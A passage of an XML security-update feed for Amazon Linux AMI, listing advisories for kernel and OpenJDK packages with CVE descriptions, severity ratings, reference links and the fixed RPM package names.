/><updated date="2017-10-26 23:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-11176:
The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to possibly cause a situation where a value may be used after being freed (use-after-free) which may lead to memory corruption or other unspecified other impact.
1470659:
CVE-2017-11176 kernel: Use-after-free in sys_mq_notify()
CVE-2017-1000112:
Exploitable memory corruption due to UFO to non-UFO path switch
CVE-2017-1000111:
heap out-of-bounds in AF_PACKET sockets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000111" title="" id="CVE-2017-1000111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000112" title="" id="CVE-2017-1000112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11176" title="" id="CVE-2017-11176" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.38" release="16.35.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.38-16.35.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-869</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-869: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-08-15 17:30:00" /><updated date="2017-08-15 17:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10243:
It was discovered that the wsdlimport tool in the JAX-WS component of OpenJDK did not use secure XML parser settings when parsing WSDL XML documents. A specially crafted WSDL document could cause wsdlimport to use an excessive amount of CPU and memory, open connections to other hosts, or leak information.
1472666:
CVE-2017-10243 OpenJDK: insecure XML parsing in wsdlimport (JAX-WS, 8182054)
CVE-2017-10135:
A covert timing channel flaw was found in the PKCS#8 implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application repeatedly compare PKCS#8 key against an attacker controlled value could possibly use this flaw to determine the key via a timing side channel.
1471871:
CVE-2017-10135 OpenJDK: PKCS#8 implementation timing attack (JCE, 8176760)
CVE-2017-10116:
It was discovered that the LDAPCertStore class in the Security component of OpenJDK followed LDAP referrals to arbitrary URLs. A specially crafted LDAP referral URL could cause LDAPCertStore to communicate with non-LDAP servers.
1471738:
CVE-2017-10116 OpenJDK: LDAPCertStore following referrals to non-LDAP URLs (Security, 8176067)
CVE-2017-10115:
A covert timing channel flaw was found in the DSA implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application generate DSA signatures on demand could possibly use this flaw to extract certain information about the used key via a timing side channel.
1471851:
CVE-2017-10115 OpenJDK: DSA implementation timing attack (JCE, 8175106)
CVE-2017-10110:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471523:
CVE-2017-10110 OpenJDK: insufficient access control checks in ImageWatched (AWT, 8174098)
CVE-2017-10109:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1471670:
CVE-2017-10109 OpenJDK: unbounded memory allocation in CodeSource deserialization (Serialization, 8174113)
CVE-2017-10108:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1471888:
CVE-2017-10108 OpenJDK: unbounded memory allocation in BasicAttribute deserialization (Serialization, 8174105)
CVE-2017-10107:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471266:
CVE-2017-10107 OpenJDK: insufficient access control checks in ActivationID (RMI, 8173697)
CVE-2017-10102:
It was discovered that the DCG implementation in the RMI component of OpenJDK failed to correctly handle references. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of RMI registry or a Java RMI application.
1472345:
CVE-2017-10102 OpenJDK: incorrect handling of references in DGC (RMI, 8163958)
CVE-2017-10101:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471527:
CVE-2017-10101 OpenJDK: unrestricted access to com.sun.org.apache.xml.internal.resolver (JAXP, 8173286)
CVE-2017-10096:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471528:
CVE-2017-10096 OpenJDK: insufficient access control checks in XML transformations (JAXP, 8172469)
CVE-2017-10090:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471517:
CVE-2017-10090 OpenJDK: insufficient access control checks in AsynchronousChannelGroupImpl (8172465, Libraries)
CVE-2017-10089:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: ImageIO). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471270:
CVE-2017-10089 OpenJDK: insufficient access control checks in ServiceRegistry (ImageIO, 8172461)
CVE-2017-10087:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471521:
CVE-2017-10087 OpenJDK: insufficient access control checks in ThreadPoolExecutor (Libraries, 8172204)
CVE-2017-10081:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
1471711:
CVE-2017-10081 OpenJDK: incorrect bracket processing in function signature handling (Hotspot, 8170966)
CVE-2017-10074:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471534:
CVE-2017-10074 OpenJDK: integer overflows in range check loop predicates (Hotspot, 8173770)
CVE-2017-10067:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).
1471535:
CVE-2017-10067 OpenJDK: JAR verifier incorrect handling of missing digest (Security, 8169392)
CVE-2017-10053:
It was discovered that the JPEGImageReader implementation in the 2D component of OpenJDK would, in certain cases, read all image data even if it was not used later. A specially crafted image could cause a Java application to temporarily use an excessive amount of CPU and memory.
1471889:
CVE-2017-10053 OpenJDK: reading of unprocessed image data in JPEGImageReader (2D, 8169209)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10053" title="" id="CVE-2017-10053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10067" title="" id="CVE-2017-10067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10074" title="" id="CVE-2017-10074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10081" title="" id="CVE-2017-10081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10087" title="" id="CVE-2017-10087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10089" title="" id="CVE-2017-10089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10090" title="" id="CVE-2017-10090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10096" title="" id="CVE-2017-10096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10101" title="" id="CVE-2017-10101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10102" title="" id="CVE-2017-10102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10107" title="" id="CVE-2017-10107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10108" title="" id="CVE-2017-10108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10109" title="" id="CVE-2017-10109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10110" title="" id="CVE-2017-10110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10115" title="" id="CVE-2017-10115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10116" title="" id="CVE-2017-10116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10135" title="" id="CVE-2017-10135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10243" title="" id="CVE-2017-10243" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.151-2.6.11.0.74.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-870</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-870: important priority package update for kernel</title><issued date="2017-08-17 18:09:00" /><updated date="2017-11-03 05:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8831:
The saa7164_bus_get function in drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel through 4.10.14 allows local users to cause a denial of service (out-of-bounds array access) or possibly have unspecified other impact by changing a certain sequence-number value, aka a &quot;double fetch&quot; vulnerability.
1449980:
CVE-2017-8831 kernel: Double fetch vulnerability in saa7164_bus_get function
CVE-2017-7542:
An integer overflow vulnerability in ip6_find_1stfragopt() function was found. A local attacker that has privileges (of CAP_NET_RAW) to open raw socket can cause an infinite loop inside the ip6_find_1stfragopt() function.
1473649:
CVE-2017-7542 kernel: Integer overflow in ip6_find_1stfragopt() causes infinite loop
CVE-2017-7533:
A race condition was found in the Linux kernel, present since v3.14-rc1 through v4.12. The race happens between threads of inotify_handle_event() and vfs_rename() while running the rename operation against the same file. As a result of the race the next slab data or the slab&#039;s free list pointer can be corrupted with attacker-controlled data, which may lead to the privilege escalation.
1468283:
CVE-2017-7533 kernel: a race between inotify_handle_event() and sys_rename()
CVE-2017-11473:
Buffer overflow in the mp_override_legacy_irq() function in arch/x86/kernel/acpi/boot.c in the Linux kernel through 4.12.2 allows local users to gain privileges via a crafted ACPI table.
1473209:
CVE-2017-11473 kernel: Buffer overflow in mp_override_legacy_irq()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11473" title="" id="CVE-2017-11473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7533" title="" id="CVE-2017-7533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7542" title="" id="CVE-2017-7542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8831" title="" id="CVE-2017-8831" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.43" release="17.38.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.43-17.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-871</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-871: medium priority package update for php56</title><issued date="2017-08-17 18:16:00" /><updated date="2017-08-17 22:43:00" 